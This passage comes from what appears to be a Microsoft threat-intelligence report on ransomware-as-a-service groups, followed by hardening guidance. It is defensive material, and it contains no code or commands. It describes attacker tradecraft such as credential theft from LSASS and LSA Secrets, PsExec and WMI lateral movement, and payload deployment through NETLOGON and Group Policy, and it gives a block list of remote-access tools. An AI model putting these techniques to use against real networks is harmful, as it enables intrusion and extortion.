attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), 